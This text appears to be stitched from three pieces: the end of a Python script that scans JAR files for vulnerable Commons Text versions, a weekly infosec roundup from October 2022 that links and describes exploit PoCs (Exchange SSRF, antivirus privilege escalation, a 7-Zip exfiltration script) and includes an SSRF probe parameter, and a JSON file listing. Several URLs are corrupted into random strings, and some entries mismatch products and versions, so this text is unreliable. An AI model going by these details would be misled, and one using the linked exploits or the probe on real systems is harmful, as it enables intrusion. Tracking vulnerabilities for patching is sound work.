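        for name, content in entries.items():
            zf.writestr(name, content)
    return buf.getvalue()


def build_sample_tree(root):
    """Constructed sample deployments; none of this is real inventory data."""
    root = Path(root)
    meta = "groupId=org.apache.commons\nartifactId=commons-text\nversion={}\n"
    old = make_jar({POM_PROPS: meta.format("1.9")})
    fixed = make_jar({POM_PROPS: meta.format("1.10.0")})
    layout = {
        "svc-a/app.war": make_jar({"WEB-INF/lib/commons-text-1.9.jar": old}),
        "svc-b/commons-text-1.10.0.jar": fixed,   # already upgraded
        "svc-c/textlib.jar": old,                 # renamed copy, found via metadata
    }
    for rel, data in layout.items():
        target = root / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_bytes(data)


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        for location, version in scan_tree(tmp):
            print(f"commons-text {version} (< 1.10.0): {location}")
```

A hit only shows that an affected version is present; whether the application passes untrusted input to the library's string interpolation still has to be checked separately.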

<details>
 <summary> PoC for CVE & Exploit (Total : 12 new 0-day in last week) :
  
 > Every week we track the recently discovered exploits and PoCs for CVEs.  
</summary>
 
   - [PoC CVE-2022-42045](https://github.com/ReCryptLLC/CVE-2022-42045)
        
       - Target/Product: **Zemana amsdk.sys kernel-mode driver**
       - Affected Version:  Watchdog Anti-Malware 4.1.422 , Zemana AntiMalware 3.2.28, Zemana AntiLogger v2.74.2.664.
       - Description : We discovered an arbitrary code injection in the Zemana amsdk.sys kernel-mode driver, a part of the Zemana Antimalware SDK. The vulnerability allows arbitrary code to be injected into one of the driver's code sections and then executed with kernel-mode privileges (local privilege escalation from admin to kernel mode). This vulnerability could be used, for example, to disable Driver Signature Enforcement and then to install unsigned kernel-mode drivers.
 
 
   - [PoC CVE-2022-36663-PoC](https://github.com/Qeisi/CVE-2022-36663-PoC)
       
       - Target/Product: **Gluu**
       - Affected Version: < v4.4.1 
       - Title : Internal network scanner through Gluu IAM blind SSRF.
       - Description : Gluu IAM is vulnerable to blind SSRF which can be exploited to scan the internal network for open ports depending on response times. To check if the target is vulnerable, add `&request_uri=http://burpcollab` to the `/oxauth/restv1/authorize` request and poll for incoming traffic from the target server.

   - [PoC CVE-2021-46422](https://github.com/Awei507/CVE-2021-46422)
       
       - Target/Product: **Google Chrome**
       - Affected Version: PoC maker claims "All" but CVE says version < 80.0.3987.149
       - Solution : google-chrome-upgrade-latest
       - Description : Use after free in WebGL in Google Chrome prior to 80.0.3987.149 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.
                                                                                      
   - [PoC CVE-2022-21970](https://github.com/Malwareman007/CVE-2022-21970)
        
       - Target/Product: **Microsoft Edge**
       - Affected Version: < 97.0.1072.62
       - Description : Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability. This vulnerability allows an attacker to execute JavaScript code on every host without permission. An attacker can also steal local system files and manipulate actions against the machine, resulting in changes to internal developer settings in Microsoft Edge.
                                         
          
   - [CVE-2022-41040 Metasploit ProxyNotShell](https://github.com/TaroballzChen/CVE-2022-41040-metasploit-ProxyNotShell)
        
       - Target/Product: **MS Exchange**
       - Description : The Metasploit script (PoC) for CVE-2022-41040. Microsoft Exchange is vulnerable to a server-side request forgery (SSRF) attack. An authenticated attacker can use the vulnerability to elevate privileges.
 
   - [CVE-2022-22947](https://github.com/crowsec-edtech/CVE-2022-22947)
        
       - Target/Product: **Spring Cloud Gateway**
       - Affected Version: Spring Cloud Gateway < 3.0.7 & < 3.1.1 Code Injection (RCE)
       - Description : Applications using Spring Cloud Gateway are vulnerable to a code injection attack when the Gateway Actuator endpoint is enabled, exposed and unsecured. A remote attacker could make a maliciously crafted request that could allow arbitrary remote execution on the remote host.
                                         
   - [7-Zip PostExploit](https://github.com/Qeisi/7-ZipPostExp)
        
       - Target/Product: **7-Zip**
       - Affected Version: Tested on Version 19.00
       - Description : 7-ZipPostExploit is a post-exploitation script to exfiltrate 7-zip files (tested on version 19.00; the attacker has access to plaintext documents). PoC for exfiltrating sensitive data encrypted by 7-zip to an external attacker server. This is done in the post-exploitation phase.
 
   - [CVE-2022-41040](https://github.com/kljunowsky/CVE-2022-41040-POC)  
                                                                 
       - Target/Product: **Microsoft Exchange Server**
       - Description : PoC for Microsoft CVE-2022-41040 - Server Side Request Forgery (SSRF) in Microsoft Exchange Server.
       - [Zeroday Microsoft Exchange Server checker (Virtual Patching checker)](https://github.com/VNCERT-CC/0dayex-checker)

   - [PoC CVE-2022-3368](https://github.com/Wh04m1001/CVE-2022-3368)
                                                                 
        - Target/Product: **Avira**
        - Affected version : "Avira Security" – for Windows version < 1.1.71.30554
        - Description/Issue/Flaw : PoC for an arbitrary file move vulnerability in the Software Update component of Avira Security. Users have the option to use this feature to update any outdated software on their PC; when this feature is used, the Avira Security service drops downloaded files in `c:\ProgramData\Avira\Security\Temp`. The first file created in the subdirectory is in the format `<random 4 numbers>_<filename>`, and later this file is moved to just `<filename>` (the leading numbers and underscore are removed). This directory has DACLs that don't allow unprivileged users to modify/delete newly created files, but it does allow a user to create a junction. This can be abused by creating a junction point to a user-controlled directory which has more permissive DACLs; this way, when new files are created in subdirectories, the user is able to modify them and leverage this to obtain an arbitrary file move, which leads to LPE by writing a DLL in the system32 directory that is later loaded by a privileged service. The current PoC loads the DLL in the Windows Update service; the DLL doesn't implement any kind of mutex to check if the exploit was already executed, which results in multiple cmd.exe processes being created as the DLL is loaded multiple times.
 
 
   - [CVE-2022-23131](https://github.com/Mr-xn/cve-2022-23131)
        
       - Target/Product: **Zabbix**
       - Description : Zabbix Unsafe Session Storage.
 
   - [Sploits](https://github.com/3sjay/sploits)
        
       - Target/Product: **aukey**
       - Description : aukey-wr-01-RCE-0day.
 
 
   - [CVE-2022-27502](https://github.com/alirezac0/CVE-2022-27502)
        
       - Target/Product: **RealVNC server**
       - Affected Version:  aukey wr-r01 ROUTER 0day 
       - Description : RealVNC server up to 6.9.0 DLL Hijacking Exploit.

 </details>
 
---
Have a good weekend #12

---


## CVE's that matter : [Weekly Infosec Update](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/) -> 12th October-18th October 2022.

 
      Security Patched within a Week: Latest vulnerabilities patched within the last two weeks (12th Oct - 18th October 2022),
                                      featuring releases from Apple, Microsoft, Adobe, GitHub, Google, Linux (Ubuntu, Kali etc.), etc.
        
      CVE ANALYSIS & POC:             PoC for CVE-2022-40684 & Nuclei template, CVE-2022-41033, CVE-2022-36067, CVE-2021-45067, CVE-2022-42889/Text4Shell
                                      and a detailed report of the top CVEs most used by Chinese state-sponsored cyber actors since 2020 

         
      CVE POC (0-Day):                CVE-2021-46422 (Google Chrome), CVE-2022-41852, CVE-2021-45067, PoC for CVE-2022-40684 & Nuclei template,
                                      CVE-2022-41033, Zeroday Microsoft Exchange Server checker (Virtual Patching checker), DropBox-XPC-Exploit,  
                                    
<details>
<summary>
Security Patched within a Week:
 
 > We track the latest security advisories of top vendors and pick out the high and critical vulnerabilities that have been patched within a week.
</summary>
 
- *Here’s a look at the latest security issues (severity: Critical or High) patched by top vendors in the last 2 weeks (12th Oct - 18th October 2022). If you are using an old version of any of the vendor products mentioned, avoid being tricked into opening a specially crafted website in a browsing context, which an attacker could potentially exploit; we highly recommend **upgrading or updating vendor products from the original source.***
 
 - **Apple security advisory** : 
   - A vulnerability (CVE-2022-22658) was found in Apple iOS up to 16.0.2 (smartphone operating system). This issue affects some unknown processing of the component Email Handler. The manipulation with an unknown input leads to a denial of service vulnerability.
 
 - **Google security advisory** : 
   - This week Google released advisories for [Pixel](https://source.android.com/docs/security/bulletin/pixel/2022-10-01), [Android Automotive OS Update](https://source.android.com/docs/security/bulletin/aaos/2022-10-01) and [Android](https://source.android.com/docs/security/bulletin/2022-10-01). Our advice is to update these products.
 
 - **Adobe security advisory** : 
   - Adobe has released security updates to address multiple vulnerabilities in Adobe software (ColdFusion, Acrobat and Reader, Adobe Commerce and Magento Open Source, Dimension). An attacker can exploit some of these vulnerabilities to take control of an affected system.
 
 - **GitHub security advisory** : 
   - The rubygem sqlite3 v1.5.1 upgrades the packaged version of libsqlite from v3.39.3 to v3.39.4.
   - [aws/amazon-redshift-jdbc-driver](https://github.com/aws/amazon-redshift-jdbc-driver/security/advisories/GHSA-jc69-hjw2-fm86) : A potential remote command execution issue exists within redshift-jdbc42 versions 2.1.0.7 and below. 
 
 - Several security issues were fixed in different versions of **Ubuntu** Linux kernel packages. We highly recommend updating & upgrading these packages.
   - **Ubuntu 22.04** : thunderbird, kitty, isc-dhcp - DHCP server and client, python-django - High-level Python web development framework, strongswan - IPsec VPN solution etc.
 
   - **Ubuntu 20.04 LTS** : unzip - De-archiver for .zip files, gmp - Multiprecision arithmetic library developers tools, heimdal - Heimdal Kerberos Network Authentication Protocol, linux-ibm - Linux kernel for IBM cloud systems, LibreOffice, kitty, gthumb - image viewer and browser, dotnet6 - dotNET CLI tools and runtime, linux - Linux kernel, linux-aws - Linux kernel for Amazon Web Services (AWS) systems, linux-bluefield - Linux kernel for NVIDIA BlueField platforms, linux-gke - Linux kernel for Google Container Engine (GKE) systems, linux-gkeop - Linux kernel for Google Container Engine (GKE) systems, linux-hwe-5.4 - Linux hardware enablement (HWE) kernel, linux-ibm - Linux kernel for IBM cloud systems, linux-ibm-5.4 - Linux kernel for IBM cloud systems, linux-kvm - Linux kernel for cloud environments, linux-oracle - Linux kernel for Oracle Cloud systems.

   - **Ubuntu 18.04 LTS** : unzip - De-archiver for .zip files, gmp - Multiprecision arithmetic library developers tools, heimdal - Heimdal Kerberos Network Authentication Protocol, linux-aws-5.4 - Linux kernel for Amazon Web Services (AWS) systems, linux-aws - Linux kernel for Amazon Web Services (AWS) systems, linux-gcp-4.15 - Linux kernel for Google Cloud Platform (GCP) systems, advancecomp - collection of recompression utilities, linux - Linux kernel, linux-aws - Linux kernel for Amazon Web Services (AWS) systems, linux-bluefield - Linux kernel for NVIDIA BlueField platforms, linux-gke - Linux kernel for Google Container Engine (GKE) systems, linux-gkeop - Linux kernel for Google Container Engine (GKE) systems, linux-hwe-5.4 - Linux hardware enablement (HWE) kernel, linux-ibm - Linux kernel for IBM cloud systems, linux-ibm-5.4 - Linux kernel for IBM cloud systems, linux-kvm - Linux kernel for cloud environments, linux-oracle - Linux kernel for Oracle Cloud systems.


 - **Microsoft** 
   - [Weakness in Microsoft Office 365 Message Encryption could expose email contents](https://www.helpnetsecurity.com/2022/10/14/weakness-office-365-encryption/)
   - Microsoft has released updates to address multiple vulnerabilities in Microsoft software. An attacker can exploit some of these vulnerabilities to take control of an affected system. [55+ security issues have been fixed in Microsoft products, packages & applications](https://msrc.microsoft.com/update-guide/releaseNote/2022-Oct) such as Edge (Chromium-based), Microsoft Graphics Component, Microsoft Office: Word, SharePoint, Role: Windows Hyper-V, Visual Studio Code, Microsoft WDAC OLE DB provider for SQL, NuGet Client, Remote Access Service Point-to-Point Tunneling Protocol, Active Directory Domain Services etc.

</details>

<details>
<summary>
CVE Analysis, writeups & reports: (7 analysis that matter in Last 1 Week)
 
 > Every week, we collect the recently discovered writeups & reports for CVEs.  
</summary>
 
  - [Analysis: CVE-2022-8BQAzQwVETtFWGmAFZjAwNSYA7M4EczfocpPa2kZ6AiC1tVQuAhJTRjLG5Nkk4QqFWHxiKBdi6RuUFjC5zMhvhUyK7tatMA/)
   
     - [POC CVE-2022-40684](https://github.com/horizon3ai/CVE-2022-40684)
     - [Nuclei template CVE-2022-4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbRyFTLRNyDmT1a1boZV40684.yaml)
     - [Added module for CVE-2022-40684 in Metasploit framework](https://github.com/rapid7/metasploit-framework/pull/17143)

     - Vendor : **Fortinet**
     - Affected : FortiOS version 7.2.0 through 7.2.1 and 7.0.0 through 7.0.6, FortiProxy version 7.2.0 and version 7.0.0 through 7.0.6, and FortiSwitchManager version 7.2.0 and 7.0.0 
     - Patched : Apply updates per vendor instructions.
     - Description : An authentication bypass using an alternate path or channel [CWE-288] in Fortinet FortiOS, FortiProxy and FortiSwitchManager allows an unauthenticated attacker to perform operations on the administrative interface via specially crafted HTTP or HTTPS requests.
                                                                        
  - [Analysis:CVE-2022-41033](https://www.helpnetsecurity.com/2022/10/11/cve-2022-41033/)
      - Vendor : **Microsoft Products**
      - Affected : All versions of Windows starting with Windows 7 and Windows Server 2008 are vulnerable. 
      - Patched : Apply updates per vendor instructions.
      - Description : Microsoft Windows COM+ Event System Service contains an unspecified vulnerability that allows for privilege escalation. This vulnerability is considered to have a low attack complexity. It has an exploitability score of 1.8 out of four. The potential impact of an exploit of this vulnerability is considered to be very high.
              
   - [Analysis : CVE-2021-45067](https://hacksys.io/blogs/adobe-reader-xfa-ansi-unicode-confusion-information-leak)                   
   - [PoC : CVE-2021-45067](https://github.com/hacksysteam/CVE-2021-45067)
                                     
       - Target/Product: **[Acrobat Reader DC](https://get.adobe.com/reader/otherversions/)**
       - Affected Version : 21.007.20099 (and earlier), 20.004.30017 (and earlier) and 17.011.30204 (and earlier).
       - Description/Issue/Flaw : Out-of-bounds read caused by treating an ANSI string as Unicode in Acrobat Reader DC versions. This vulnerability can be exploited to leak sensitive information from the sandboxed Adobe Reader process.
 
   - [Analysis : CVE-2022-36067](https://github.com/patriksimek/vm2/security/advisories/GHSA-mrgp-mrhc-5jrq)
        - Title : [Critical vm2 sandbox escape flaw uncovered, patch ASAP!](https://www.helpnetsecurity.com/2022/10/10/cve-2022-36067/) 
        - Target : **vm2 JavaScript sandbox library**
        - Affected : version < 3.9.11
        - Description : Oxeye researchers discovered a severe vm2 vulnerability (CVE-2022-36067) that has received the maximum CVSS score of 10.0. Called SandBreak, this new vulnerability requires R&D leaders, AppSec engineers, and security professionals to ensure they immediately patch the vm2 sandbox if they use it in their applications. A threat actor can bypass the sandbox protections to gain remote code execution rights on the host running the sandbox.  
                                    
   - [Analysis : CVE-2022-42889/ Text4Shell](https://cyberwatch-fr.translate.goog/cve/cve-2022-42889-text4shell-comment-detecter-et-corriger-cette-vulnerabilite-sur-apache-commons-text/?_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en-GB)                              
       - Target/Product: **Apache Commons Text** is a software component used to manipulate character strings, published by the Apache Foundation.
       - Description/Issue/Flaw : CVE-2022-42889 (Text4Shell) is a remote code execution vulnerability in Apache Commons Text. On October 13, 2022, the Apache Foundation published a vulnerability in the code of the Apache Commons Text project and posted a message to this effect on the project's mailing list. This vulnerability closely resembles the Log4Shell CVE series and is referenced as CVE-2022-42889. Apache Commons Text is used to check if one string contains another, or to construct messages from a preconfigured format.
         
   - [Analysis : Windows CLFS Zero-Day Vulnerability CVE-2022-37969 Part 1: Root Cause Analysis](https://www.zscaler.com/blogs/security-research/technical-analysis-windows-clfs-zero-day-vulnerability-cve-2022-37969-part) ([MSRC: CVE-2022-37969](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-37969))
       - Target/Product: **Microsoft** 
       - Description/Issue/Flaw : CVE-2022-37969: An attacker who successfully exploits this vulnerability may gain SYSTEM privileges. The 0-day exploit can execute the privilege escalation successfully on Windows 10 and Windows 11 prior to the September patch. The vulnerability is caused by the lack of a strict bounds check on the field cbSymbolZone in the Base Record Header for the base log file (BLF) in CLFS.sys. If the field cbSymbolZone is set to an invalid offset, an out-of-bounds write will occur at the invalid offset. In this two-part blog series, we will demystify the vulnerability and the 0-day exploit discovered in-the-wild. The blogs consist of two parts: an analysis of the root cause, and an analysis of the exploit. In this blog, we first present a detailed analysis of the root cause for CVE-2022-37969.
         
 
   - [Detailed Report of Top CVEs most used by Chinese state-sponsored cyber actors since 2020](https://media.defense.gov/2022/Oct/06/2003092365/-1/-1/0/Joint_CSA_Top_CVEs_Exploited_by_PRC_cyber_actors_.PDF)
        
      - Summary : [Top CVEs most used by Chinese state-sponsored cyber actors since 2020](https://www.cisa.gov/uscert/ncas/alerts/aa22-279a)
      - Affected Vendors : 
 <img src="https://user-images.githubusercontent.com/25515871/195232896-65a359b5-91b4-4dbf-ae64-05b4e8ff3a82.jpg" width="500" height="450"> 
 
 - Description: US authorities (NSA, FBI, CISA) expose the top 20 vulnerabilities actively exploited by Chinese state-sponsored attackers. NSA, CISA, and FBI urge organizations to apply the recommendations below:
         
    - Update and patch systems as soon as possible. Prioritize patching vulnerabilities identified in this CSA and other known exploited vulnerabilities.
    - Utilize phishing-resistant multi-factor authentication whenever possible. Require all accounts with password logins to have strong, unique passwords, and change passwords immediately if there are indications that a password may have been compromised. 
    - Block obsolete or unused protocols at the network edge. 
    - Upgrade or replace end-of-life devices.
    - Move toward the Zero Trust security model. 
    - Enable robust logging of Internet-facing systems and monitor the logs for anomalous activity.
 
</details>

<details>
 <summary> PoC for CVE & Exploit (Total : 5+ new 0-days that matter this week and 4 important CVEs from last week) :
  
 > Every week we're tracking the recently discovered Exploit and PoC for CVE.  
</summary>
 
   - [Poc CVE-2021-46422](https://github.com/Awei507/CVE-2021-46422)
       
       - Target/Product: **Google Chrome**
       - Affected Version: PoC maker claims "All" but CVE says version < 80.0.3987.149
       - Solution : google-chrome-upgrade-latest
       - Description : Use after free in WebGL in Google Chrome prior to 80.0.3987.149 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.
                                                                                      
   - [PoC CVE-2022-41852 (unofficial)](https://github.com/Warxim/CVE-2022-41852)
        
       - Target/Product: **Apache**
       - Description : Remote Code Execution in the JXPath library, where CVE-2022-41852 allows attackers to execute code on the application server. For example, the methods JXPathContext.getValue(path) and JXPathContext.iterate(path) are dangerous if you let users send input into the path parameter. You can read more about this [vulnerability here](https://hackinglab.cz/en/blog/remote-code-execution-in-jxpath-library-cve-2022-41852/).

 
- Important **Poc from Last Week** :
 
   - [CVE-2022-41208-PoC](https://github.com/CronUp/Vulnerabilidades/blob/main/proxynotshell_checker.nse)
        
       - Target/Product: **Microsoft Exchange Server**
       - Affected Version: <8.3.1 
       - Description : ProxyNotShell – CVE-2022-40140 & CVE-2022-41082. Metasploit Framework implementation of a zero-day bug in Microsoft Exchange Server which leads to RCE.
 
   - [CVE-2022-41040](https://github.com/kljunowsky/CVE-2022-41040-POC)  
       - Target/Product: **Microsoft Exchange Server**
       - Description : PoC for Microsoft CVE-2022-41040 - Server Side Request Forgery (SSRF) in Microsoft Exchange Server.
       - [Zeroday Microsoft Exchange Server checker (Virtual Patching checker)](https://github.com/VNCERT-CC/0dayex-checker)
 
   - [PS5-4.03-Kernel-Exploit](https://github.com/Cryptogenic/PS5-4.03-Kernel-Exploit)
       - Target/Product: **PS5**
       - Exploit support firmwares : 4.03, 4.50, 4.51
       - Description/Issue/Flaw : PS5 kernel exploit based on TheFlow's IPV6 Use-After-Free (UAF), which was reported on HackerOne. The exploit strategy is for the most part based on TheFlow's BSD/PS4 PoC with some changes to accommodate the annoying PS5 memory layout (for more see Research Notes section). It establishes an arbitrary read / (semi-arbitrary) write primitive. This exploit and its capabilities have a lot of limitations, and as such, it's mostly intended for developers to play with to reverse engineer some parts of the system.
                                                    
   - [DropBox-XPC-Exploit](https://github.com/Pwnrin/DropBox-XPC-Exploit)
        - Target/Product: **Dropbox**
        - Description/Issue/Flaw : [DropBox-XPC-Exploit](https://github.com/Pwnrin/DropBox-XPC-Exploit) is an exploit for PID Reuse and Logical Error in DropBox's XPC service.
         
</details>

---

## CVE's that matter : [Weekly Infosec Update](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/) -> 27th Sept-11th October 2022



 
    Security Patched within a Week: Latest vulnerabilities that have been patched within the last two weeks (12th Oct - 18th October 2022),
                                    featuring releases from Microsoft, Adobe, GitHub, Cisco, Linux (Ubuntu, Kali etc.), Firefox etc.

    CVE:ANALYSIS & POC:             CVE-2022-34960, CVE-2022-41218, HackerOne report #1672388 - GitLab, CVE-2022-33987,
                                    CVE-2022-36635 and Detailed Report of Top CVEs most used by Chinese state-sponsored cyber actors since 2020

    CVE POC (0-Day):                Zeroday Microsoft Exchange Server checker (Virtual Patching checker), DropBox-XPC-Exploit,
                                    CVE Collection of jQuery UI XSS Payloads, nuclei-template for CVE-2022-35405, An updated list of PoC's CVE's,
                                    PS5-4.03-Kernel-Exploit, CVE-2022-41040, CVE-2022-26726, CVE-2022-30600, CVE-2022-39197, CVE-2021-29156 Exploit,
                                    CVE-2022-30206, CVE-2022-2992, CVE-2022-41208, CVE-2022-2274 and CVE-2022-36804

---


## CVE's that matter : [Weekly Infosec Update](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/) -> 21st Sept-27th Sept 2022

 
        Security Patched within a Week: Latest vulnerabilities that have been patched within a week (21st Sep-27th Sep 2022),
                                        featuring releases from Apple, Google, Microsoft, GitHub, Linux (Ubuntu, Kali etc.), WordPress etc.
        
        CVE:ANALYSIS & POC:             CVE-2022-39197, CVE-2022-36934, CVE-2022-27492, CVE-2022-40286, CVE-2021-41653, CVE-2022-39205,
                                        CVE-2022-39206, CVE-2022-39207 & CVE-2022-39208.
         
        CVE POC (0-Day):                CVE-2022-39197, CVE-2022-36804, CVE-2022-30206, CVE-2022-28282, CVE-2022-34729, Cronos poc, 
                                        CVE-2022-23743, Webshell - Open source project, Windows10 - Custom Kernel Signers.
  	
<details>
<summary>
Security Patched within a Week: 
</summary>
- Here’s a look at the latest security issues (Severity : Critical or High) that have been patched in a week (21st Sep-27th Sep 2022). We highly recommend upgrading or updating from the original source.
 
- **WhatsApp** Security Advisories September Update : CVE-2022-36934(prior to v2.22.16.12) and CVE-2022-27492(prior to v2.22.16.2).
- **Node.js** Update Fixes High Severity Flaws : CVE-2022-32212, CVE-2022-32215 & CVE-2022-35256. (Affected v18.x, v16.x, and v14.x )
- Several security issues were fixed in the different versions of **Ubuntu** Linux kernel packages.
  - **Ubuntu 22.04** : bind9, mako, tiff, linux-gkeop, python-oauthlib, linux-oem-5.17, linux-gcp, linux-gke, linux-raspi - Li, etc.
  - **Ubuntu 20.04 LTS** & **Ubuntu 18.04 LTS**: bind9, mako, tiff, libjpeg-turbo, vim, xen, etcd, linux-hwe-5.15/5.4, linux-lowlatency-hwe-5.15/5.4, linux, linux-aws, linux-aws-5.15/5.4, linux-azure, linux-azure-5.15/5.4, linux-kvm, linux-bluefield, linux-gkeop, linux-ibm, linux-ibm-5.4, linux-oracle, linux-oracle-5.4.
- **Microsoft** [Endpoint Configuration Manager Spoofing Vulnerability](https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-37972)
- **Cisco** [NX-OS Software Border Gateway Protocol Denial of Service Vulnerability](https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180620-nxosbgp?vs_f=Cisco%20Security%20Advisory&vs_cat=Security%20Intelligence&vs_type=RSS&vs_p=Cisco%20NX-OS%20Software%20Border%20Gateway%20Protocol%20Denial%20of%20Service%20Vulnerability&vs_k=1)
- **Mozilla** Releases Security Updates for [Firefox 105](https://www.mozilla.org/en-US/security/advisories/mfsa2022-40/), [Firefox ESR 102.3](https://www.mozilla.org/en-US/security/advisories/mfsa2022-41/), [Thunderbird 102.3](https://www.mozilla.org/en-US/security/advisories/mfsa2022-42/) & [Thunderbird 91.13.1](https://www.mozilla.org/en-US/security/advisories/mfsa2022-39/).
- **Jenkins** [Security Advisory 2022-09-21](https://www.jenkins.io/security/advisory/2022-09-21/).
- **Zoho** [ManageEngine Multiple Products Remote Code Execution Vulnerability CVE-2022-35405(CVSS score 9.8)](https://socprime.com/blog/cve-2022-35405-detection-cisa-warns-of-adversaries-leveraging-manageengine-rce-flaw/)
- **Sophos** [Firewall Code Injection Vulnerability CVE-2022-3236](https://www.helpnetsecurity.com/2022/09/26/cve-2022-3236/)
- **IBM** [Maximo Asset Management 7.6.1.1, 7.6.1.2, and 7.6.1.3 (CVE-2022-40616)](https://nvd.nist.gov/vuln/detail/CVE-2022-40616) 
- **Adobe** [Bridge version 12.0.2 (and earlier) and 11.1.3 (and earlier) are affected by a Heap-based Buffer Overflow vulnerability](https://helpx.adobe.com/security/products/bridge/apsb22-49.html)

</details>

<details>
<summary>
CVE Analysis & PoC(9):
</summary>

   - [Analysis: CVE-2022-39197](https://securityonline.info/cve-2022-39197-critical-cobalt-strike-bug-could-lead-to-rce-attacks/)
        
        - Title -> Critical Cobalt Strike bug could lead to RCE attacks.
        - [PoC CVE-2022-39197](https://github.com/burpheart/cve-2022-39197)
        - Affected Version : prior to 4.7.1.
        - Description/Issue/Flaw : The CVE-2022-39197 vulnerability exists in Cobalt Strike’s Beacon payload, which may allow an attacker to trigger XSS by setting a fake username in the Beacon configuration, thereby causing remote code execution on the CS Server.
 
   - [Analysis: CVE-2022-36934 and CVE-2022-27492](https://nakedsecurity.sophos.com/2022/09/27/whatsapp-zero-day-exploit-news-scare-what-you-need-to-know/)
        - Title -> WhatsApp “zero-day exploit” news scare – what you need to know
        - Affected Version : Android prior to v2.22.16.12, Business for Android < v2.22.16.12, iOS < v2.22.16.12, Business for iOS < v2.22.16.12
        - Description/Issue/Flaw : CVE-2022-36934 (An integer overflow in version v2.22.16.12 could result in remote code execution in an established video call.) & CVE-2022-27492 (An integer underflow in v2.22.16.2 could have caused remote code execution when receiving a crafted video file.)
                                                                                                                                                
   - [Analysis: CVE-2022-39205, CVE-2022-39206, CVE-2022-39207 & CVE-2022-39208](https://blog.sonarsource.com/onedev-remote-code-execution/)
        - Title -> Securing Developer Tools: **OneDev** Remote Code Execution.
        - Affected Version : 7.2.9.
        - Description/Issue/Flaw : OneDev is an open source alternative to GitHub, GitLab and Bitbucket, with features such as code search, CI/CD and static code analysis. In this article Paul Gerste discusses the CVE IDs mentioned above.
                                                               
   - [Analysis: CVE-2022-40286](https://www.x86matt
Condensed preview — 94 files, each showing path, character count, and a content snippet. Download the .json file or copy for the full structured content (875K chars).
[
  {
    "path": ".github/FUNDING.yml",
    "chars": 84,
    "preview": "# These are supported funding model platforms\n\ncustom: https://paypal.me/Vicky481\n\n\n"
  },
  {
    "path": ".pdfs/INDEX",
    "chars": 1359,
    "preview": "** ** [Resources Mindmap](https://github.com/RESETHACKER-COMMUNITY/Resources/blob/main/ResourcesMindmap.md)\n/Resources/b"
  },
  {
    "path": "API-HelpDesk/Readme.md",
    "chars": 1383,
    "preview": "# Here's 23 free ways to learn about API security testing: by Hany Soliman\n\n1. Video: Traceable AI, API Hacking 101.\n2. "
  },
  {
    "path": "Bugbounty/BB-FAQ/BB_FAQ.md",
    "chars": 1513,
    "preview": "# BUG BOUNTY FAQ - freqently asked questions (Beginners friendly - Under Development)\nNote: Contents inside the **RESETH"
  },
  {
    "path": "Bugbounty/BB-FAQ/Domain-Information.md",
    "chars": 5892,
    "preview": "## Domain Information :\n\n- Find Acquisition(google 6 month rule), ASNS, reversewhois,  (Identifying IPs and main TLDS)\n "
  },
  {
    "path": "Bugbounty/BB-FAQ/Readme.md",
    "chars": 1007,
    "preview": "##### For every bug bounty hunter, keep these things in mind when you are reporting any vulnerability\n\n- 1-Report should"
  },
  {
    "path": "Bugbounty/BBMindmap/Readme.md",
    "chars": 1348,
    "preview": "## This folder contails mutiple Bugbounty Mindmap curated by all the amazing bughunters. \nUse it as inspiration for crea"
  },
  {
    "path": "Bugbounty/Readme.md",
    "chars": 5643,
    "preview": "# Bug Bounty Helpdesk(Under Development)\n\n  > Note: Contents inside the **RESETHACKER Community** are to help our commun"
  },
  {
    "path": "Bugbounty/Table_of_Vulnerability.md",
    "chars": 2374,
    "preview": "**Writeups** : Vulnerability cheetsheets\nThis file contains the detailed write up on cheetsheets, Reports, Disclosure, e"
  },
  {
    "path": "Bugbounty/Website_inputs_testing.md",
    "chars": 340,
    "preview": "Index | Topics\n---|---\n**1** Bozhidar Bozhanov | [User Authentication Best Practices Checklist](https://dzone.com/articl"
  },
  {
    "path": "Bugbounty/Wordlists/AllWordlists.md",
    "chars": 6694,
    "preview": "# Top Recommended wordlists available for red pentesting, bugbounty and password bruteforcing❤️😳 \n\n#### Perpose : This r"
  },
  {
    "path": "Bugbounty/Wordlists/Readme.md",
    "chars": 214,
    "preview": "TODO : \n1. Create a wordlist based on Backend technology and add a Readme.md to summurize that Technology.\n2. And Create"
  },
  {
    "path": "Bugbounty/Wordlists.md",
    "chars": 3733,
    "preview": "# Bruteforce Wordlists\nIndex | wordlists\n-- | --\n\n▫️ | [SecLists](https://github.com/danielmiessler/SecLists)\n\n▫️ | [Fuz"
  },
  {
    "path": "Bugbounty/bugbounty-FAQ.md",
    "chars": 1764,
    "preview": "# BUG BOUNTY FAQ - freqently asked questions (Beginners friendly - Under Development)\nNote: Contents inside the **RESETH"
  },
  {
    "path": "Bugbounty/burpsuite.md",
    "chars": 3951,
    "preview": "\n\n# Burp Suite for Pentester\n\nIndex | title\n-- | --\n**0**. [Burpsuite - Getting Started, configure, recon setup and unde"
  },
  {
    "path": "Burpsuite/Assets/Readme.md",
    "chars": 1,
    "preview": "\n"
  },
  {
    "path": "Burpsuite/Readme.md",
    "chars": 8910,
    "preview": "Credit: Vikram -team ResetHacker\n\n**Q: What is Burp and why is it important for penetration testing?**\n\n  Web applicatio"
  },
  {
    "path": "Burpsuite/protips.md",
    "chars": 2099,
    "preview": "# Pro Tips for Bupsuite\n\n[Author b1twis3](http://b1twis3.ca/burpsuite-30-pro-tips/) | #BurpSuiteTips\n\n## Sample : \n**[1/"
  },
  {
    "path": "CONTRIBUTING.md",
    "chars": 698,
    "preview": "# Contribution Guidelines\n\nPlease note that this project is released with a [Contributor Code of Conduct](code-of-conduc"
  },
  {
    "path": "Contributors.md",
    "chars": 96,
    "preview": "# Contributors\n\nWe are very grateful to the following people have contributed to this project.\n\n"
